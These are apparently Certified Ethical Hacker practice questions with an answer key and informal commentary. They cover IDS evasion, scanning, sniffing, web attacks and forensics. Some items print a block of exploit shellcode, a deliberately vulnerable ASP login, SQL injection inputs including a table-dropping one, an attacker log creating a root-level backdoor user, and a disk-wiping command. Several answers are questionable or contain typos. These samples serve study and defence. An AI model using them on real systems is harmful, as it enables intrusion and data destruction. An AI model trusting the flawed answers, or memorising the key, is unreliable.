0x stands for hexadecimal and DE=222, AD=173, BE=190 and EF=239
Most NIDS systems operate in layer 2 of the OSI model. These systems feed raw traffic into a
detection engine and rely on the pattern matching and/or statistical analysis to determine what is
malicious. Packets are not processed by the host's TCP/IP stack allowing the NIDS to analyze
traffic the host would otherwise discard. Which of the following tools allows an attacker to
intentionally craft packets to confuse pattern-matching NIDS systems, while still being correctly
assembled by the host TCP/IP stack to render the attack payload?
A. Defrag
B. Fragroute
C. Tcpfrag
D. Tcpdump
B. Fragroute

Fragroute intercepts, modifies and rewrites egress traffic destined for a specific host, implementing most of the attacks described in the Secure Networks "Insertion, Evasion and Denial of Service: Eluding Network Intrusion Detection" paper of January 1998. It features a simple ruleset language to delay, duplicate, drop, fragment, overlap, print, reorder, segment, source-route or otherwise monkey with all outbound packets destined for a target host, with minimal support for randomized or probabilistic behavior. This tool was written in good faith to aid in the testing of network intrusion detection systems, firewalls and basic TCP/IP stack behavior.
Shauna is the Senior Security Analyst for the Department of Defense, in charge of all aspects of
the DoD's internal network security.As one would expect, the DoD is constantly probed and
scanned by outside IP addresses, trying to find an entry into the network.Shauna leads a large
team of junior security analysts that make sure all entry points are closed off, unless that entry
point must be kept open for business purposes.If something must be kept open, Shauna and her
employees' duty is to make sure that hole is not exploited by outside attackers.
One way that this is accomplished, is to not use traditional ports for normally used services.All
employees and outside contractors that must obtain remote access for work, are notified of the
non-standard ports, and thus are able to gain access.The traditional ports used for services like
http are actually kept open, but they are redirected to a secure logical area and logged.These logs
enable Shauna and her team to analyze who is trying to obtain unauthorized access, and
prosecute if necessary.
What technique is Shauna using here?
A. Honeypot
B. Firewalking
C. Tunneling
D. Obfuscation
A. Honeypot
Mason is the network administrator at Machine Systems, Inc. He has been pushed aside in promotions due to office politics. He wants to take revenge on his boss, Matthew Smith. Being a
disgruntled employee, Mason sneaks into Matthew's office one night and boots his boss's
computer with the Knoppix CD-ROM and intends to erase the contents of his boss's hard disk, including the partition table, without leaving any trace of his action. He intends to make the hard disk data unrecoverable even to a forensics team.
Which of the following commands should Mason run in Knoppix to permanently erase the data?

A. $ delete -fik /dev/hda1
B. $ wipe -fik /dev/hda1
C. $ erase -fik /dev/hda1
D. $ secdel -fik /dev/hda1
B. $ wipe -fik /dev/hda1
Interpret the following entry:
Apr 26 06:43:05 [6283]: IDS181/nops-x86: 63.226.81.13.1351--> 172.16.1.107:53

A. A buffer overflow attempt
B. A DNS zone transfer
C. Data being retrieved from 63.226.81.13
D. An IDS evasion technique.
A. A buffer overflow.

The IDS log file is depicting numerous attacks, however, most of them are from different attackers. In reference to the attack in question, he is trying to mask his activity through appearing legitimate. During his session on the honeypot, he changes users two time sby using the "su" command.
When writing shellcodes, you must avoid ____________ because these will end the string.

A. Null bytes
B. Root bytes
C. Unicode bytes
D. Char bytes
A. Null bytes.

The null character (aka the null terminator) is a character with the value zero, present in the ASCII and Unicode character sets, and available in nearly all mainstream programming languages. The original meaning of this character was like NOP, when sent to a printer or terminal, it does nothing. (Some terminals, however, incorrectly display it as a space) Strings ending in a null character are said to be null terminated.
William has received a Tetris game from someone in his computer programming class through email.William does not really know the person who sent the game very well, but decides to install the game anyway because he really likes Tetris.
After William installs the game, he plays it for a couple of hours.The next day, William plays the Tetris game again and notices that his machine has begun to slow down. He brings up his Task Manager and sees the following programs running. What has William just installed?

A. Zombie Zapper (ZoZ)
B. Root Digger (RD)
C. Bot IRC Tunnel (BIT)
D. Remote Access Trojan (RAT)
D. Remote Access Trojan

RATs are malicious programs that run invisibly on host PCs and permit an intruder remote access and control. On a basic level, many RATs mimic the functionality of legitimate remote control programs such as Symantec's pcAnywhere, but are designed specifically for stealth installation and operation. Intruders usually hide these Trojan horses in games and other small programs that unsuspecting users then execute on their PCs. Typically, exploited users either download and execute the malicious programs or are tricked into clicking rogue e-mail attachments.
This IDS defeating technique works by splitting a datagram (or packet) into multiple fragments and
the IDS will not spot the true nature of the fully assembled datagram. The datagram is not
reassembled until it reaches its final destination. It would be a processor-intensive task for an IDS
to reassemble all fragments itself, and on a busy system the packet will slip through the IDS onto
the network.
What is this technique called?
A. IP Splicing or Packet Reassembly
B. IP Routing or Packet Dropping
C. IDS Spoofing or Session Assembly
D. IP Fragmentation or Session Splicing
D. IP fragmentation or session splicing.

The basic premise behind session splicing, or IP Fragmentation, is to deliver the payload over
multiple packets thus defeating simple pattern matching without session reconstruction. This
payload can be delivered in many different manners and even spread out over a long period of
time. Currently, Whisker and Nessus have session splicing capabilities, and other tools exist in the
wild.
You went to great lengths to install all the necessary technologies to prevent hacking attacks, such
as expensive firewalls, antivirus software, antispam systems and intrusion detection/prevention
tools in your company's network. You have configured the most secure policies and tightened
every device on your network. You are confident that hackers will never be able to gain access to your network with complex security system in place.
Your peer, Peter Smith who works at the same department disagrees with you. He says even the
best network security technologies cannot prevent hackers gaining access to the network because
of presence of "weakest link" in the security chain.
What is Peter Smith talking about?

A. Untrained staff or ignorant computer users who inadvertently become the weakest link in your
security chain
B. Continuous Spam e-mails cannot be blocked by your security system since spammers use
different techniques to bypass the filters in your gateway
C. "zero-day" exploits are the weakest link in the security chain since the IDS will not be able to
detect these attacks
D. "Polymorphic viruses" are the weakest link in the security chain since the Anti-Virus scanners will not be able to detect these attacks
A. Untrained staff or ignorant computer users who inadvertently vecome the weakest link in your security chain.
Pearls Productions, an e-commerce website (http://www. pearl-productions-shop.com) uses a
cookie to keep a user session active once a user has logged in. When a user successfully logs in
to the application, a cookie is sent to the client containing the user ID, and this is referred to when
the user requests certain functions from the server to make sure that the user has certain rights.
How would you compromise this system, which relies on cookie-based security?
A. Delete the cookie and reestablish connection to the server and access higher level privileges
B. Intercept the communication between the client and the server and change the cookie to make
the server believe that there is a user with higher privileges
C. Brute force the encryption used by the cookie and replay it back to the server
D. Inject the cookie ID into the web URL and connect back to the server
B. Intercept the communication between the client and the server and change the cookie to make the server believe that there is a user with higher privileges.
What is the problem with this ASP script (login.asp)?

<%
Set objConn = CreateObject("ADODB.Connection")
objConn.Open Application("WebUsersConnection")
sSQL="SELECT * FROM Users where Username='" & Request("user") & _
"' and Password='" & Request("pwd") & "'"
Set RS = objConn.Execute(sSQL)
If RS.EOF then
Response.Redirect("login.asp?msg=Invalid Login")
Else
Session.Authorized = True
Set RS = nothing
Set objConn = nothing
Response.Redirect("mainpage.asp")
End If
%>

A. The ASP script is vulnerable to Cross Site Scripting attack
B. The ASP script is vulnerable to XSS attack
C. The ASP script is vulnerable to SQL Injection attack
D. The ASP script is vulnerable to Session Splice attack
C. The ASP script is vulnerable to SQL Injection attack.
You are the security administrator of Jaco Banking Systems located in Boston. You are setting up an e-banking website (http://www.ejacobank.com) authentication system. Instead of issuing banking customers with a single password, you give them a printed list of 100 unique passwords. Each time the customer needs to log into the e-banking system website, the customer enters the next password on the list. If someone sees them type the password using shoulder surfing, MiTM or keyloggers, then no damage is done because the password will not be accepted a second time.
Once the list of 100 passwords is almost finished, the system automatically sends out a new password list by encrypted e-mail to the customer.
You are confident that this security implementation will protect the customer from password abuse.
Two months later, a group of hackers called "HackJihad" found a way to access the one-time password list issued to customers of Jaco Banking Systems. The hackers set up a fake website (http://www.e-jacobank.com) and used phishing attacks to direct ignorant customers to it. The fake website asked users for their e-banking username and password, and the next unused entry from their one-time password sheet. The hackers collected 200 customer's username/passwords this way. They transferred money from the customer's bank account to various offshore accounts.
Your decision of password policy implementation has cost the bank $925,000.
You immediately shut down the e-banking website while figuring out the next best security solution.
What effective security solution will you recommend in this case?
A. Implement Biometrics based password authentication system. Record the customers face image to the authentication database
B. Configure your firewall to block logon attempts of more than three wrong tries
C. Enable a complex password policy of 20 characters and ask the user to change the password immediately after they logon and do not store password histories
D. Implement RSA SecureID based authentication system
D. Implement RSA SecureID based authentication system

(Unless it's 2011, and RSA has just been hacked, and their algorithms stolen...)
How does traceroute map the route a packet travels from point A to point B?
A. It uses a protocol that will be rejected by gateways on its way to the destination
B. It manipulates the flags within packets to force gateways into generating error messages
C. It uses a TCP timestamp packet that will elicit a time exceeded in transit message
D. It manipulates the value of the time to live (TTL) within packet to elicit a time exceeded in transit message
D. It manipulates the value of the Time to Live (TTL) within packet to elicit a time exceeded in transit message.

Traceroute works by increasing the Time-To-Live (TTL) value of each successive batch of packets sent. The first three packets haev a TTL value of one (implying that they make a single hop). The next three have a value of 2, and so on. When a packet passes through a host, normally the host decrements the TTL value by one, and forward the packet to the next host. When a packet with a TTL of one reaches a host, the host discards the packet, and send an ICMP time exceeded (type 11) packet to the sender. The traceroute utility uses these returning packets to produce a list of hosts that that the packets have traversed en route to their destination.
Study the following log extract and identify the attack:
A. Cross Site Scripting
B. Hexcode Attack
C. Unicode Directory Traversal Attack
D. Multiple Domain Traversal Attack
C. Unicode Directory Traversal Attack.

The "Get /msadc/....../....../....../winnt/system32/cmd.exe?" shows that a Unicode Directory Traversal Attack has been performed.
What does the following command in "Ettercap" do?
ettercap -NCLzs --quiet
A. This command will provide you the entire list of hosts in the LAN
B. This command will detach ettercap from console and log all the sniffed passwords to a file
C. This command will check if someone is poisoning you and will report its IP
D. This command broadcasts ping to scan the LAN instead of ARP request all the subnet IPs
B. This command will detach ettercap from console and log all the sniffed passwords to a file.

-L specifies that logging will be done to a binary file and -s tells us that it is running in script mode.
John runs a Web server, IDS and firewall on his network. Recently his Web server has been under
constant hacking attacks. He looks up the IDS log files and sees no intrusion attempts but the
Web server constantly locks up and needs rebooting due to various brute force and buffer
overflow attacks but still the IDS alerts no intrusion whatsoever.
John becomes suspicious and views the Firewall logs and he notices huge SSL connections
constantly hitting his Web server.
Hackers have been using the encrypted HTTPS protocol to send exploits to the Web server and
that was the reason the IDS did not detect the intrusions.
How would John protect his network from these types of attacks?
A. Install a proxy server and terminate SSL at the proxy
B. Enable the Firewall to filter encrypted HTTPS traffic
C. Enable the IDS to filter encrypted HTTPS traffic
D. Install a hardware SSL "accelerator" and terminate SSL at this layer
A. Install a proxy sever and terminate SSL at the proxy,

D. Install a hardware SSL accelerator, and terminate SSL at this layer.

By terminating the SSL connection at a proxy or a SSL accelerator, and then using clear text the distance between the proxy/accelerator and the server, you make it possible for the IDS to scan the traffic.
Bob reads an article about how insecure wireless networks can be. He gets approval from his management to implement a policy of not allowing any wireless devices on the network. What other steps does Bob need to take to successfully implement this?
A. Disable all wireless protocols at the firewall
B. Disable SNMP on the network so wireless devices cannot be configured
C. Continuously survey the area for wireless devices
D. Purchase a device that jams wireless signals
E. Train users in the new policy
C. Continuously survey the area for wireless devices.

E. Train users in the new policy.

If someone installs an access point and connects it with the network, there is no way to find it unless you are constantly surveying the area for wireless devices. SNMP and firewalls cannot prevent the installation of wireless devices on the corporate network.
Which of the following is not considered to be a part of active sniffing?
A. MAC Duplicating
B. SMAC Fueling
C. ARP Spoofing
D. MAC Flooding
B. SMAC Fueling

Because it doesn't exist.

MAC duplicating, ARP spoofing and MAC flooding are all part of active sniffing.

CEH writers are assholes.
The SYN flood attack sends TCP connections requests faster than a machine can process them.
Attacker creates a random source address for each packet SYN flag set in each packet is a request to open a new connection to the server from the spoofed IP address.
Victim responds to spoofed IP address, then waits for confirmation that never arrives (timeout wait
is about 3 minutes)
Victim's connection table fills up waiting for replies and ignores new connections
Legitimate users are ignored and will not be able to access the server
How do you protect your network against SYN Flood attacks?

A. Stack Tweaking. TCP stacks can be tweaked in order to reduce the effect of SYN floods. Reduce the timeout before a stack frees up the memory allocated for a connection.
B. Check the incoming packet's IP address with the SPAM database on the Internet and enable the filter using ACLs at the Firewall
C. RST cookies - The server sends a wrong SYN/ACK back to the client. The client should then generate a RST packet telling the server that something is wrong. At this point, the server knows the client is valid and will now accept incoming connections from that client normally
D. Micro Blocks. Instead of allocating a complete connection, simply allocate a micro-record of 16- bytes for the incoming SYN object
E. SYN cookies. Instead of allocating a record, send a SYN-ACK with a carefully constructed sequence number generated as a hash of the clients IP address, port number, and other information. When the client responds with a normal ACK, that special sequence number will be included, which the server then verifies. Thus, the server first allocates memory on the third packet of the handshake, not the first
A. Stack Tweaking. TCP stacks can be tweaked in order to reduce the effect of SYN floods. Reduce the timeout before a stack frees up the memory allocated for a connection.
C. RST cookies - The server sends a wrong SYN/ACK back to the client. The client should then generate a RST packet telling the server that something is wrong. At this point, the server knows the client is valid and will now accept incoming connections from that client normally
D. Micro Blocks. Instead of allocating a complete connection, simply allocate a micro-record of 16-
bytes for the incoming SYN object
E. SYN cookies. Instead of allocating a record, send a SYN-ACK with a carefully constructed sequence number generated as a hash of the clients IP address, port number, and other information. When the client responds with a normal ACK, that special sequence number will be included, which the server then verifies. Thus, the server first allocates memory on the third packet of the handshake, not the first
While investigating a claim of a user downloading illegal material, the investigator goes through
the files on the suspect's workstation. He comes across a file that is just called "file.txt" but when
he opens it, he finds the following:
#define MAKE_STR_FROM_RET(x)
((x)&0xff),(((x)&0xff00)>>8),(((x)&0xff0000)>>16),(((x)&0xff000000)>>24)
char infin_loop[]= /* for testing purposes */
"\xEB\xFE";
char bsdcode[] = /* Lam3rZ chroot() code by venglin */
"\x31\xc0\x50\x50\x50\xb0\x7e\xcd\x80\x31\xdb\x31\xc0\x43"
"\x43\x53\x4b\x53\x53\xb0\x5a\xcd\x80\xeb\x77\x5e\x31\xc0"
"\x8d\x5e\x01\x88\x46\x04\x66\x68\xff\xff\x01\x53\x53\xb0"
"\x88\xcd\x80\x31\xc0\x8d\x5e\x01\x53\x53\xb0\x3d\xcd\x80"
"\x31\xc0\x31\xdb\x8d\x5e\x08\x89\x43\x02\x31\xc9\xfe\xc9"
"\x31\xc0\x8d\x5e\x08\x53\x53\xb0\x0c\xcd\x80\xfe\xc9\x75"
"\xf1\x31\xc0\x88\x46\x09\x8d\x5e\x08\x53\x53\xb0\x3d\xcd"
"\x80\xfe\x0e\xb0\x30\xfe\xc8\x88\x46\x04\x31\xc0\x88\x46"
"\x07\x89\x76\x08\x89\x46\x0c\x89\xf3\x8d\x4e\x08\x8d\x56"
"\x0c\x52\x51\x53\x53\xb0\x3b\xcd\x80\x31\xc0\x31\xdb\x53"
"\x53\xb0\x01\xcd\x80\xe8\x84\xff\xff\xff\xff\x01\xff\xff\x30"
"\x62\x69\x6e\x30\x73\x68\x31\x2e\x2e\x31\x31\x76\x65\x6e"
"\x67\x6c\x69\x6e";
static int magic[MAX_MAGIC],magic_d[MAX_MAGIC];
static char *magic_str=NULL;
int before_len=0;

What can he infer from this file?

A. A picture that has been renamed with a .txt extension
B. An encrypted file
C. A uuencoded file
D. A buffer overflow
D. A buffer overflow exploit.

This is a buffer overflow exploit with its payload in hexadecimal format.
Reflective DDoS attacks do not send traffic directly at the targeted host. Instead, they usually
spoof the originating IP addresses and send the requests at the reflectors. These reflectors
(usually routers or high-powered servers with a large amount of network resources at their
disposal) then reply to the spoofed targeted traffic by sending loads and loads of data to the final
target.
How would you detect these reflectors on your network?
A. Run Vulnerability scanner on your network to detect these reflectors
B. Run floodnet tool to detect these reflectors
C. Look for the banner text by running Zombie Zappers tools
D. Scan the network using Nmap for the services used by these reflectors
D. Scan the network using Nmap for the services used by these reflectors.
Which type of attack is port scanning?
A. Information gathering
B. Denial of service attack
C. Unauthorized access
D. Web server attack
A. Information gathering.
One of the ways to map a targeted network for live hosts is by sending an ICMP ECHO request to the broadcast or the network address. The request would be broadcasted to all hosts on the targeted network. The live hosts will send an ICMP ECHO Reply to the attacker's source IP
address.
You send a ping request to the broadcast address 192.168.5.255.
[root@ceh/root]# ping -b 192.168.5.255
WARNING: pinging broadcast address PING 192.168.5.255 (192.168.5.255) from 192.168.5.1 : 56(84) bytes of data.
64 bytes from 192.168.5.1: icmp_seq=0 ttl=255 time=4.1 ms
64 bytes from 192.168.5.5: icmp_seq=0 ttl=255 time=5.7 ms
---
---
---
There are 40 computers up and running on the target network. Only 13 hosts send a reply while others do not. Why?

A. You cannot ping a broadcast address. The above scenario is wrong.
B. You should send a ping request with this commandping 192.168.5.0-255
C. Windows machines will not generate an answer (ICMP ECHO Reply) to an ICMP ECHO
request aimed at the broadcast address or at the network address.
D. Linux machines will not generate an answer (ICMP ECHO Reply) to an ICMP ECHO request aimed at the broadcast address or at the network address.
C. Windows machines will not generate an answer (ICMP ECHO Reply) to an ICMP ECHO request aimed at the broadcast address or at the network address.
Larry is a criminal hacker with over 20 years of experience in breaking into systems. Larry's main objective used to entail defacing government and big corporation websites with information they did not want released to the public. But within the last few years, Larry has found avenues of
creating revenue through breaking into systems and selling the information. On numerous occasions, Larry was able to break into the networks of small local banks and glean sensitive customer information including names, social security numbers, bank account numbers, and PINs.
Larry then sold this information through covert channels to dummy corporations based in Eastern
Europe where cyber-law has not matured yet. Larry has been able to cover his tracks in the past, but with the rise of new technology such as honeypots, Larry is concerned about falling into traps
set by security professionals.
What tool could Larry use to help evade traps like honeypots?
A. Honeyd evasion server
B. Send-Safe proxy server
C. SPECTER relay server
D. KFSensor tunneling server
B. Send-Safe proxy server.

Larry no longer has to worry about this, however, as he has found cushy employment with Wikileaks...
How would you prevent session hijacking attacks?
A. Using non-Internet protocols like http secures sessions against hijacking
B. Using biometrics access tokens secures sessions against hijacking
C. Using hardware-based authentication secures sessions against hijacking
D. Using unpredictable sequence numbers secures sessions against hijacking
D. Using unpredictable sequence numbers secures sessions against hijacking.

Protection of a session needs to focus on the unique session identifier, because it is the only thing that distinguishes between users. If the session ID is compromised, attackers can impersonate other users on the system. The first thing is to ensure that the sequence of identification numbers issued by the session management system is unpredictable; otherwise it's trivial to hijack another user's session. Having a large number of possible session IDs (which means they should be very long) means that an attacker is forced to try a lot more permutations.
Maurine is working as a security consultant for Hinklemeir Associates. She has asked the Systems
Administrator to create a group policy that would not allow null sessions on the network. The
Systems Administrator is fresh out of college and has never heard of null sessions and does not
know what they are used for. Maurine is trying to explain to the Systems Administrator that
hackers will try to create a null session when footprinting the network.
Why would an attacker try to create a null session with a computer on a network?
A. To create a user with administrative privileges for later use
B. Enumerate users and shares
C. Install a backdoor for later attacks
D. Escalate his/her privileges on the target server
B. To enumerate users and shares.

The Null Session is often referred to as the "Holy Grail" of Windows hacking. Listed as the number 5 Windows vulnerability on the SANS/FBI Top 20 list, Null Sessions take advantage of the flaws in the CIFS/SMB (Common Internet File System / Server Messaging Block) architecture. You can establish a Null SEssion with a Windows (NT/2000/XP) host by logging on with a null username and PW. Using these null connections allows you to gather the following information from the host:
-List of users and groups
-List of machines
-List of shares
-Users and host SIDs
You are performing a port scan on a subnet that has the ICMP protocol blocked. You discover 23
live systems and after doing a port scan on each of them; you notice that they all show port 21 in
closed state. What would be the next logical step that you should perform?
A. Perform a ping sweep to identify any additional systems that might be up
B. Connect to open ports to discover applications
C. Perform a SYN scan on port 21 to identify any additional systems that might be up
D. Rescan every computer to verify the results
C. Perform a SYN scan on Port 21 to find any additional systems that might be up.

As ICMP is blocked, you'll have trouble determining which computers are up and running by using a ping sweep. As all the 23 computeres that you had discovered earlier had port 21 closed, it's probable that any additional, previously unknown systems will also have port 21 closed. By running a SYN scan on port 21 over the target network, you might get replies from additional systems.
While examining audit logs, you discover that people are able to telnet into the SMTP server on
port 25. You would like to block this, though you do not see any evidence of an attack or other
wrong doing. However, you are concerned about affecting the normal functionality of the email
server. From the following options choose how best you can achieve this objective?
A. Block port 25 at the firewall
B. Shut off the SMTP service on the server
C. Force all connections to use a username and password
D. None of the above
E. Switch from Windows Exchange to UNIX Sendmail
D. None of the above.

Blocking port 25 in the firewall, or forcing all connections to use username and password would have the consequences that the server is unable to communicate with other SMTP servers. Turning off the SMTP service would disable the e-mail function completely. All e-mail servers use SMTP to communicate with other e-mail servers, adn therefore changing e-mail servers would not help.
_____ is the process of converting something from one representation to the simplest form. It
deals with the way in which systems convert data from one form to another.
A. UCS transformation formats
B. Character Encoding
C. Canonicalization
D. Character Mapping
C. Canonicalization (c14n) is the process of converting data that has more than one possibl representation into a "standard" canonical representation. This can be done to compare different representations for equivalence, to count the number of distinct data structures (e.g. in combinatorics), to improve the efficiency of various algorithms by eliminating repeated calculations, or to make it possible to impose a meaningful sorting order.
A specific site received 91 ICMP_ECHO packets within 90 minutes from 47 different sites. 77 of
the ICMP_ECHO packets had an ICMP ID:39612 and Seq:57072. 13 of the ICMP_ECHO packets
had an ICMP ID:0 and Seq:0. What can you infer from this information?
A. 13 packets were from an external network and probably behind a NAT, as they had an ICMP ID
0 and Seq 0
B. ICMP ID and Seq numbers were most likely set by a tool and not by the operating system
C. All 77 packets came from the same LAN segment and hence had the same ICMP ID and Seq
number
D. The packets were sent by a worm spoofing the IP addresses of 47 infected sites
B. ICMP ID and Seq numbers were most likely set by a tool, and not by the OS.
Harold has just been hired on as the senior network administrator for the University of Central Michigan. He essentially is in charge of 200 servers and about 10,000 client computers. Because of the immense network size of the university, Harold wants to centrally manage the network as much as possible.
Harold supervises 10 server administrators, 4 Exchange administrators, and 20 help desk technicians. Because of the separated job duties, Harold wants to ensure that nothing is changed on the network without his knowledge and consent. His main concern is the 200 servers his subordinates take care of.
Harold wants to be alerted whenever critical files, folders, shares, etc are changed on any of the servers, and he wants all this information available to him from one management console, not a console on each individual server. What tool could Harold use to centrally manage any changes on his servers?

A. SAINT
B. Nessus
C. SATAN
D. Tripwire
D. Tripwire
This is an authentication method in which is used to prove that a party knows a password without
transmitting the password in any recoverable form over a network. This authentication is secure
because the password is never transmitted over the network, even in hashed form; only a random
number and an encrypted random number are sent.
A. Realm Authentication
B. SSL Authentication
C. Basic Form Authentication
D. Challenge/Response Authentication
E. Cryptographic Authentication
D. Challenge / Response Authentication
Bob wants to prevent attackers from sniffing his passwords on the wired network. Which of the
following lists the best options?
A. RSA, LSA, POP
B. SMB, SMTP, Smart card
C. SSID, WEP, Kerberos
D. Kerberos, Smart card, Stanford SRP
D. Kerberos, Smart Card, Stanford SRP.

All three of these are techniques where the password never leaves the computer.
During the intelligence-gathering phase of a penetration test, you discover a press release by a security products vendor stating that they have signed a multi-million dollar agreement with the company you are targeting. The contract was for vulnerability assessment tools and network
based IDS systems.
While researching on that particular brand of IDS you notice that its default installation allows it to
perform sniffing and attack analysis on one NIC and is managed and sends reports via another NIC. The sniffing interface is completely unbound from the TCP/IP stack by default. Assuming the defaults were used, how can you detect these sniffing interfaces?
A. Send attack traffic and look for it to be dropped by the IDS
B. Use a ping flood against the IP of the sniffing NIC and look for latency in the responses
C. Set your IP to that of the IDS and look for it to begin trying to knock your computer off the network
D. The sniffing interface cannot be detected
D. The sniffing interface cannot be detected.

When a NIC is set to promiscuous mode, it blindly takes whatever comes through to its network interface and sends it to the Application layer. This is why they are so hard to detect.
After studying the following log entries, how many user IDs can you identify that the attacker has
tampered with?
1. mkdir -p /etc/X11/applnk/Internet/.etc
2. mkdir -p /etc/X11/applnk/Internet/.etcpasswd
3. touch -acmr /etc/passwd /etc/X11/applnk/Internet/.etcpasswd
4. touch -acmr /etc /etc/X11/applnk/Internet/.etc
5. passwd nobody -d
6. /usr/sbin/adduser dns -d/bin -u 0 -g 0 -s/bin/bash
7. passwd dns -d
8. touch -acmr /etc/X11/applnk/Internet/.etcpasswd /etc/passwd
9. touch -acmr /etc/X11/applnk/Internet/.etc /etc
A. nobody, dns
B. nobody, IUSR_
C. IUSR_
D. acmr.dns
A. nobody.dns

Passwd is the command used to modify a user password, and it has been used together with the usernames nobody and dns.
Bank of Timbuktu is a medium-sized, regional financial institution in Timbuktu. The bank has
deployed a new Internet-accessible Web application recently. Customers can access their account
balances, transfer money between accounts, pay bills and conduct online financial business using
a Web browser.
John Stevens is in charge of information security at Bank of Timbuktu. After one month in
production, several customers have complained about the Internet enabled banking application.
Strangely, the account balances of many of the bank's customers had been changed! However,
money hasn't been removed from the bank; instead, money was transferred between accounts.
Given this attack profile, John Stevens reviewed the Web application's logs and found the following entries:
Attempted login of unknown user: johnm
Attempted login of unknown user: susaR
Attempted login of unknown user: sencat
Attempted login of unknown user: pete'';
Attempted login of unknown user: ' or 1=1--
Attempted login of unknown user: '; drop table logins--
Login of user jason, sessionID= 0x75627578626F6F6B
Login of user daniel, sessionID= 0x98627579539E13BE
Login of user rebecca, sessionID= 0x9062757944CCB811
Login of user mike, sessionID= 0x9062757935FB5C64
Transfer Funds user jason
Pay Bill user mike
Logout of user mike
What kind of attack did the Hacker attempt to carry out at the bank?
A. The Hacker first attempted logins with suspected user names, then used SQL Injection to gain access to valid bank login IDs.
B. Brute force attack in which the Hacker attempted guessing login ID and password from password cracking tools.
C. The Hacker attempted Session hijacking, in which the Hacker opened an account with the bank, then logged in to receive a session ID, guessed the next ID and took over Jason's session.
D. The Hacker used a generator module to pass results to the Web server and exploited Web application CGI vulnerability.
A. The hacker first attempted logins with suspected user names, then used SQL injection to gain access to valid bank login IDs.

Typing things like ' or 1=1 - in the login field is evidence of a hacker trying out whether the system is vulnerable to SQL injection.
System administrators sometimes post questions to newsgroups when they run into technical challenges. As an ethical hacker, you could use the information in newsgroup postings to glean insight into the makeup of a target network. How would you search for these posting using Google search?
A. Search for the target company name at http://groups.google.com
B. Search in Google using the key search strings "thetarget company" and "newsgroups"
C. Use NNTP websites to search for these postings
D. Search in Google using the key search strings "the target company" and "forums"
A. Search for the target company name at http://groups.google.com

This is the easiest way to access various newsgroups today. (Who the hell uses newsgroups anymore?) Before http://groups.google.com you had to use special NNTP clients or subscribe to some NNTP to Web services.

That is, after you'd booted up your old coal-burning computer and fed it some punch-cards...
While attempting to discover the remote operating system on the target computer, you receive the
following results from an nmap scan:
Starting nmap V. 3.10ALPHA9 ( www.insecure.org/nmap/ )
Interesting ports on 172.121.12.222:
(The 1592 ports scanned but not shown below are in state: filtered)
PortStateService
21/tcpopenftp
25/tcpopensmtp
53/tcpcloseddomain
80/tcpopenhttp
443/tcpopenhttp
Remote operating system guess: Too many signatures match to reliably guess the OS.
Nmap run completed -- 1 IP address (1 host up) scanned in 277.483 seconds
What would you do next to fingerprint the OS?
A. Perform a tcp traceroute to the system using port 53
B. Run an nmap scan with the -vv option
C. Perform a Firewalk with that system as the target IP
D. Connect to the active services and review the banner information
D. Connect to the active services and review the banner information.
Most people don't care about changing the banners presented by applications listening to open ports and therefore you should get fairly accurate information when grabbing banners from open ports with, for example, a telnet application.
What can you conclude from the following nmap results?
Starting nmap V. 3.10ALPHA9 ( www.insecure.org/nmap/ )
Interesting ports on 192.168.1.1:
(The 1592 ports scanned but not shown below are in state: closed)
PortStateService
21/tcpopenftp
25/tcpopensmtp
80/tcpopenhttp
389/tcpopenldap
443/tcpopenhttps
3268/tcpopengc
Remote operating system guess: Too many signatures match to reliably guess the OS.
Nmap run completed -- 1 IP address (1 host up) scanned in 91.66 seconds

A. The system is not running Linux or Solaris
B. The system is not firewall enabled
C. The system is a Windows Domain Controller
D. The system is not properly patched.
B. The system is not firewall enabled,

C. The system is a Windows Domain Controller.

There is no report of any ports being filtered.
A company is legally liable for the content of email that is sent from its systems, regardless of
whether the message was sent for private or business-related purposes. This could lead to
prosecution for the sender and for the company's directors if, for example, outgoing email was
found to contain material that was pornographic, racist, or likely to incite someone to commit an
act of terrorism.
You can always defend yourself by "ignorance of the law" clause.
A. False
B. True
A. False

WTF does "ignorance of the law" have to do with the facts of the question? The issue is whether the company is legally liable for the acts of an employee on their IS ("did they know, or should they have known...")

But, give 'em half a point for knowing the Latin terminology for "ignorance of the law is no excuse."
Port scans are often used to profile systems before they are attacked. Knowing what ports are
open allows an attacker to determine which services can be attacked.
How do you prevent a hacker from launching FIN, NULL, and X-MAS scans on your network?
A. Block TCP/IP packets with FIN flag enabled at the firewall
B. Enable IDS signatures to block these scans
C. You cannot block a hacker from launching these scans on your network
D. Modify the kernel to never send reset (RST) packets
D. Modify the kernel to never send RST (reset) packets.
Within the context of Computer Security, which of the following statements describes Social Engineering best?
A. Social Engineering is the means put in place by human resource to perform time accounting
B. Social Engineering is a training program within sociology studies
C. Social Engineering is the act of publicly disclosing information
D. Social Engineering is the act of getting needed information from a person rather than breaking into a system
D. Social engineering is the act of getting needed information from a person rather than breaking into a system.
Jane wishes to forward X-Windows traffic to a remote host as well as POP3 traffic. She is worried
that adversaries might be monitoring the communication link and could inspect captured traffic.
She would like to tunnel the information to the remote end but does not have VPN capabilities to
do so. Which of the following tools can she use to protect the link?
A. RSA
B. PGP
C. SSH
D. MD5
C. SSH

Port forwarding, or tunneling, is a way to forward otherwise insecure TCP traffic through SSH. You can secure, for example, POP3, SMTP, and HTTP connections that would otherwise be insecure.
Choose one of the following pseudo codes to describe this statement:
if we have written 200 characters to the buffer variable, the stack should stop because it cannot
hold any more data.
A. If (I < 200) then exit (1)
B. If (I > 200) then exit (1)
C. If (I <= 200) then exit (1)
D. If (I >= 200) then exit (1)
D. If (I>=200) then exit (1)
Which of the following LM hashes represents a password of less than 8 characters?
A. 0182BD0BD4444BF836077A718CCDF409
B. 44EFCE164AB921CQAAD3B435B51404EE
C. BA810DBA98995F1817306D272A9441BB
D. E52CAC67419A9A224A3B108F3FA6CB6D
E. CEC52EB9C8E3455DC2265B23734E0DAC
F. B757BF5C0D87772FAAD3B435B51404EE
B, F.

The last 8 characters of each of these hashes is the same, indicating that they have been padded.
A user on your Windows 2000 network has discovered that he can use L0phtcrack to sniff the
SMB exchange which carries user logons. The user is plugged into a hub with 23 other systems.
However, he is unable to capture any logons though he knows that other users are logging on.
What do you think is the most likely reason behind this?
A. L0phtcrack only sniffs logons to web servers
B. Kerberos is preventing it
C. There is a NIDS present on that segment
D. Windows logons cannot be sniffed
B. Kerberos is preventing it.

In a Windows 2000 network using Kerberos you normally use pre-authentication and the user
password never leaves the local machine so it is never exposed to the network so it should not be able to be sniffed.
Michael is a junior security analyst working for the National Security Agency (NSA) working
primarily on breaking terrorist encrypted messages. The NSA has a number of methods they use
to decipher encrypted messages including Government Access to Keys (GAK) and inside
